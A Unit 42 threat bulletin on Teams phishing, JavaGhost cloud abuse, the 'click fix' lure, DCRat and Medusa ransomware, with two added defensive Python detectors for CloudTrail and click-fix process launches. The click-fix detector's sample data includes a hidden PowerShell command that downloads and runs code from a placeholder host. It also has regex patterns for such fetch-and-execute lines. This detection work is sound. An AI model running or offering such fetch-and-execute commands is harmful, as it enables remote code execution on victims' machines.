
Unit 42 Threat Bulletin - April 2025
By Palo Alto Networks Unit 42
Unit 42 Threat Intelligence & Incident Response. Intelligence Driven. Response Ready.
Originally published on April 23, 2025.
Welcome back! Unit 42 is reviving our monthly Threat Bulletin newsletter. We’d love to hear your thoughts on the new look and feel. Drop a comment below and tell us what you think!
"Cybersecurity is not a cost center; it’s an investment in digital trust, the currency of the future."
- Richard Emerson, manager of reactive threat intelligence, Unit 42
Incident Response Highlight: What's Trending Right Now in Unit 42 Incident Response Investigations
Dark Scorpius Phishing Through Microsoft Teams
What's Happening:
- Consultants observed Dark Scorpius (distributors of Black Basta ransomware) targeting users via phishing through Microsoft Teams chat
Why It Matters:
- Social engineering tactics remain an effective method criminals use to target victims
- Ransomware attacks can cost millions of dollars, ruin an organization's reputation and cause great harm by releasing PII
Recommended Actions:
- Train employees regularly on recognizing social engineering tactics
- Training should go beyond written phishing tests to include recognition of callback phishing scams, deepfakes and other sophisticated tactics
- Learn more about common initial access vectors in our 2025 Unit 42 Global Incident Response Report
Spotlight Threat: Need-to-Know Threat Actor Activity
JavaGhost Uses Cloud Misconfigurations to Launch Phishing Attacks
What's Happening:
- JavaGhost targeted organizations’ misconfigured AWS environments by leveraging exposed credentials
- The group abused these environments to send phishing campaigns
- Unit 42 observed the group using advanced evasion methods to cover its tracks
Why It Matters:
- Abuse of your cloud environments for phishing can incur operational costs and cause reputational damage
Recommended Actions:
- Hunt within CloudTrail logs for detectable JavaGhost activity, as described in our full article
- Proactively create alerts based on these detectable events
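The bulletin defers the specific JavaGhost indicators to the full article, so the following is an added example, not code from Unit 42 or the article, of the general hunting pattern it recommends: read CloudTrail records, match them against a watchlist of event names, and correlate hits per access key so that a credential that both changes identities and starts sending mail stands out. The event names in the watchlist are real AWS API names chosen for illustration and are assumptions about what to watch, not the article's list; the log records and access keys are constructed (the key IDs are the placeholders AWS uses in its documentation).

```python
import json
from collections import defaultdict

# CloudTrail event names to hunt for, grouped by eventSource. These are real AWS
# API names chosen as illustrative examples of identity changes and email-sending
# activity that a compromised credential might perform. Assumption: this is NOT
# the indicator list from Unit 42's full JavaGhost article; tune it from that
# article and from your own account baseline.
WATCHLIST = {
    "ses.amazonaws.com": {
        "VerifyEmailIdentity", "CreateEmailIdentity", "SendEmail",
        "SendRawEmail", "UpdateAccountSendingEnabled",
    },
    "iam.amazonaws.com": {
        "CreateUser", "CreateAccessKey", "AttachUserPolicy", "CreateLoginProfile",
    },
}

# Constructed sample CloudTrail log file (not real telemetry). The access key IDs
# are the placeholder keys used in AWS documentation.
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2025-04-01T10:02:11Z", "eventSource": "ses.amazonaws.com",
     "eventName": "VerifyEmailIdentity", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2025-04-01T10:03:40Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2025-04-01T10:04:02Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2025-04-01T10:09:55Z", "eventSource": "ses.amazonaws.com",
     "eventName": "SendRawEmail", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2025-04-01T10:15:00Z", "eventSource": "ses.amazonaws.com",
     "eventName": "SendEmail", "sourceIPAddress": "10.0.4.21",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/mail-sender/app",
                      "accessKeyId": "ASIAI44QH8DHBEXAMPLE"}},
]})


def load_records(raw):
    """Parse a CloudTrail log file body ({"Records": [...]}) into a list of events."""
    return json.loads(raw)["Records"]


def hunt(records, watchlist=WATCHLIST):
    """Return every record whose eventSource/eventName pair is on the watchlist."""
    hits = []
    for rec in records:
        if rec.get("eventName") in watchlist.get(rec.get("eventSource"), ()):
            ident = rec.get("userIdentity", {})
            hits.append({
                "time": rec.get("eventTime"),
                "service": rec["eventSource"],
                "event": rec["eventName"],
                "actor": ident.get("arn"),
                "key": ident.get("accessKeyId"),
                "ip": rec.get("sourceIPAddress"),
            })
    return hits


def summarize(hits):
    """Group hits by access key so one credential's activity is seen as a whole."""
    by_key = defaultdict(lambda: {"actor": None, "services": set(), "events": [], "ips": set()})
    for h in hits:
        entry = by_key[h["key"]]
        entry["actor"] = h["actor"]
        entry["services"].add(h["service"])
        entry["events"].append(h["event"])
        entry["ips"].add(h["ip"])
    return dict(by_key)


def flag_keys(summary, min_services=2):
    """Escalate credentials whose watched activity spans several services
    (e.g. IAM changes followed by SES sending), a stronger signal than one hit."""
    return sorted(k for k, v in summary.items() if len(v["services"]) >= min_services)


if __name__ == "__main__":
    hits = hunt(load_records(SAMPLE_TRAIL))
    summary = summarize(hits)
    for key in flag_keys(summary):
        v = summary[key]
        print(f"ALERT {key} ({v['actor']}): {v['events']} from {sorted(v['ips'])}")
```

In the constructed data the `ci-deploy` key verifies a sending identity, creates an IAM user and then sends raw mail, so it is flagged, while the application role that only calls `SendEmail` is a single-service hit and is left for baseline review. The same per-key grouping is what you would feed into a proactive alert rule, rather than alerting on each watched API call in isolation.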
TTP Breakdown: Unpacking the Latest Threat Actor Tactics, Techniques and Procedures
The Click Fix Method
What's Happening:
- “Click fix” refers to web pages that copy a malicious script into the victim's clipboard
- These pages show detailed instructions telling victims to open the Windows Run dialog, paste the script into it and run it
- Use of this method has increased since July 2024
- A form of the MITRE ATT&CK® technique User Execution (T1204)
Why It Matters:
- Threat actors can use the “click fix” method to circumvent protections organizations have implemented against other types of attacks, tricking victims into installing malicious programs themselves
Recommended Actions:
- Educate people to be cautious of unexpected website pop-ups
- Watch for timely threat intelligence updates about this and other TTPs used in active campaigns, shared weekly through our social channels.
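Because the "click fix" lure ends with the victim running a pasted command from the Run dialog, the resulting process has explorer.exe as its parent, which gives defenders a hunting pivot alongside user education. The following is an added example, not code from the bulletin or Unit 42, of a scoring rule over process-creation telemetry: interpreter children of explorer.exe earn a point, and each paste-and-run command-line trait (hidden window, encoded command, in-memory execution, remote fetch, URL on the command line) earns another. The events, hostnames, paths and URLs are constructed, the point values and threshold are assumptions to tune against your own baseline, and the field names assume telemetry already normalised to `parent_image`, `image` and `command_line`.

```python
import re

# Interpreters that a "paste this into Run and press Enter" lure typically ends
# up launching. Processes started from the Run dialog (Win+R) have explorer.exe
# as their parent, which is the pivot this detection keys on.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits that are unusual for an interactive user but common in
# paste-and-run lures. Each match adds one point (assumed weighting).
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
    (re.compile(r"downloadstring|invoke-webrequest|\birm\b|\bcurl\b", re.I), "remote fetch"),
    (re.compile(r"https?://", re.I), "URL on command line"),
    (re.compile(r"\bmshta\b", re.I), "mshta launcher"),
]

# Constructed process-creation events in the shape an EDR or Sysmon event 1
# would give you after normalisation (hosts, paths and URLs are placeholders).
SAMPLE_EVENTS = [
    {"id": "e1", "host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -NoProfile -c "iex (irm https://example.invalid/fix)"'},
    {"id": "e2", "host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"id": "e3", "host": "ws02", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"id": "e4", "host": "ws03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/page"},
    {"id": "e5", "host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons). Non-interpreter children score 0 outright."""
    if basename(event["image"]) not in INTERPRETERS:
        return 0, []
    reasons = []
    if basename(event["parent_image"]) == "explorer.exe":
        reasons.append("launched from explorer.exe (Run dialog / shell)")
    cmd = event.get("command_line", "")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(cmd):
            reasons.append(label)
    return len(reasons), reasons


def detect(events, threshold=2):
    """Return alerts for events scoring at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"id": ev["id"], "host": ev["host"],
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['host']} {a['id']} score={a['score']}: {', '.join(a['reasons'])}")
```

With the default threshold of 2, the hidden-window PowerShell and the mshta launch from explorer.exe alert, a scheduled backup script started from cmd.exe does not, and a user who merely opens a bare PowerShell prompt from Run scores 1 and stays below the line; lowering the threshold to 1 surfaces that last case too, which is the usual tuning trade-off.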
Quick Insights
Malware in Focus: DarkCrystalRAT
- First observed in 2018 when advertised on Russian underground forums
- Now commonly distributed and advertised through Telegram
- Often abbreviated as DCRat
- Written primarily in C# on the .NET platform, targeting Windows operating systems
- Has a modular design and allows clients to develop and share custom plugins
Threat Actor in Focus: Transforming Scorpius
- Unit 42 designator for the group behind Medusa ransomware
- First appeared in late 2022
- Uses a ransomware-as-a-service (RaaS) model
- Maintains data leak site for extortion
Aggressively pursues revenue through:
- Ransom demands in the millions
- Fees for data deletion
- Fees for data download
- Fees for payment extensions
Get Ahead
Unit 42 Insider Threat Services help detect, deter, and disrupt malicious and accidental insider threats, leveraging our years of experience to ensure your organization remains resilient against internal risks.
Additional Insights and Must-Reads

Never miss out on new Unit 42 research. Subscribe to our Threat Research Center.